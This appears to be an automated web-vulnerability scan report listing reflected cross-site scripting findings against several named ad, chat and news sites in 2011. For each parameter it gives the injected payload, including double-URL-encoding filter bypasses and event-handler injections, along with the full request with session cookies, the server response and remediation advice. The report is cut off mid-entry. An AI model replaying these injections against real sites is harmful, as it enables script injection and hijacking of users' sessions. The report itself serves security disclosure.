GET /2/CollectiveB31253d"><script>alert(1)</script>f83c851237/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 358 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e40f"><script>alert(1)</script>1047b7427bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/CollectiveB3/ATTWL3e40f"><script>alert(1)</script>1047b7427bb/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 360 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a24a"><script>alert(1)</script>02370102126 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/CollectiveB3/ATTWL/11Q11a24a"><script>alert(1)</script>02370102126/MobRON/300/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 360 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d49e8"><script>alert(1)</script>4b4cd2b3892 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/CollectiveB3/ATTWL/11Q1/MobRONd49e8"><script>alert(1)</script>4b4cd2b3892/300/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 360 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e10"><script>alert(1)</script>116c0e64645 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/CollectiveB3/ATTWL/11Q1/MobRON/30092e10"><script>alert(1)</script>116c0e64645/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:37 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427e3"><script>alert(1)</script>c963c08b509 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90427e3"><script>alert(1)</script>c963c08b509/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of the page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52300"%3balert(1)//e9d6d4317e4 was submitted in the page parameter. This input was echoed as 52300";alert(1)//e9d6d4317e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us52300"%3balert(1)//e9d6d4317e4&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:17:40 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 703
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd was submitted in the REST URL parameter 2. This input was echoed as bff27"><script>alert(1)</script>8465f0f4edd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hc/5296924bff27%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1 Host: base.liveperson.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; LPit=false; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Master;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:16:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: text/html;charset=UTF-8 Last-Modified: Fri, 28 Jan 2011 14:16:53 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 26922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
The value of the lpCallId request parameter is copied into the HTML document as plain text between tags. The payload d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d was submitted in the lpCallId parameter. This input was echoed as d57f1<img src=a onerror=alert(1)>cca1be53e6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hc/5296924/?lpCallId=1296223662870-765d57f1<img%20src%3da%20onerror%3dalert(1)>cca1be53e6d&lpjson=2&cmd=visitorWantsToChat&isOn=true&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1 Host: base.liveperson.net Connection: keep-alive Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:17:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 14:17:20 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 143
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a165</script><script>alert(1)</script>03c6015ae8f was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom4a165</script><script>alert(1)</script>03c6015ae8f&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:23 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2148 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f614a"><script>alert(1)</script>f5926003640 was submitted in the companion parameter. This input was echoed as f614a\"><script>alert(1)</script>f5926003640 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottomf614a"><script>alert(1)</script>f5926003640&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:22 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2112 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2373%2527%253balert%25281%2529%252f%252f4229a2aac7c was submitted in the page parameter. This input was echoed as c2373';alert(1)//4229a2aac7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomec2373%2527%253balert%25281%2529%252f%252f4229a2aac7c HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:23 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2016 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c4a"><script>alert(1)</script>4b0e292800b was submitted in the page parameter. This input was echoed as 42c4a\"><script>alert(1)</script>4b0e292800b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome42c4a"><script>alert(1)</script>4b0e292800b HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:23 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2112 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582ab</script><script>alert(1)</script>272b48e55fe was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top582ab</script><script>alert(1)</script>272b48e55fe&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:22 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2143 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57af"><script>alert(1)</script>7c2b6abc9e8 was submitted in the position parameter. This input was echoed as d57af\"><script>alert(1)</script>7c2b6abc9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Topd57af"><script>alert(1)</script>7c2b6abc9e8&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: bh.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:21 GMT Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 2107 Connection: close Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
4.212. http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boston30.autochooser.com
Path:
/results.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6bfd0%3balert(1)//cb19586ae74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6bfd0;alert(1)//cb19586ae74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.asp?6bfd0%3balert(1)//cb19586ae74=1 HTTP/1.1 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:24:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Fri, 28 Jan 2011 05:23:15 GMT Set-Cookie: cid=4473467; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSSQCBSCQ=KPBLDIICNCEJNNNLADJNNJPH; path=/ Cache-control: private Content-Length: 56618
function saveFavorites() { if (document.results) { document.resu ...[SNIP]... <!-- //This area reserved for page-specific scripts var ac6bfd0;alert(1)//cb19586ae74 = new Array ( '1' ) //--> ...[SNIP]...
The value of the pagename request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60368'%3balert(1)//0236c25829e was submitted in the pagename parameter. This input was echoed as 60368';alert(1)//0236c25829e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.asp?gid=0&pagename=dealersearch.asp60368'%3balert(1)//0236c25829e&resulttype=2&postto=results.asp HTTP/1.1 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:22:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Fri, 28 Jan 2011 05:21:44 GMT Set-Cookie: cid=4473446; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSSQCBSCQ=FOBLDIICPJKEJBPLDKOCMMDB; path=/ Cache-control: private Content-Length: 76012
function saveFavorites() { if (document.results) { document.resu ...[SNIP]... <!-- //This area reserved for page-specific scripts var acgid = new Array ( '0' ) var acpagename = new Array ( 'dealersearch.asp60368';alert(1)//0236c25829e' ) var acresulttype = new Array ( '2' ) var acpostto = new Array ( 'results.asp' ) //--> ...[SNIP]...
The value of the postto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ffc'%3balert(1)//3960f4bf99 was submitted in the postto parameter. This input was echoed as 23ffc';alert(1)//3960f4bf99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp23ffc'%3balert(1)//3960f4bf99 HTTP/1.1 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:24:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Fri, 28 Jan 2011 05:23:33 GMT Set-Cookie: cid=4473468; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSSQCBSCQ=LPBLDIICLJKNBKAJIDLGADOK; path=/ Cache-control: private Content-Length: 75946
function saveFavorites() { if (document.results) { document.resu ...[SNIP]... area reserved for page-specific scripts var acgid = new Array ( '0' ) var acpagename = new Array ( 'dealersearch.asp' ) var acresulttype = new Array ( '2' ) var acpostto = new Array ( 'results.asp23ffc';alert(1)//3960f4bf99' ) //--> ...[SNIP]...
The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fee9"%3balert(1)//3539e9e682 was submitted in the f parameter. This input was echoed as 8fee9";alert(1)//3539e9e682 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
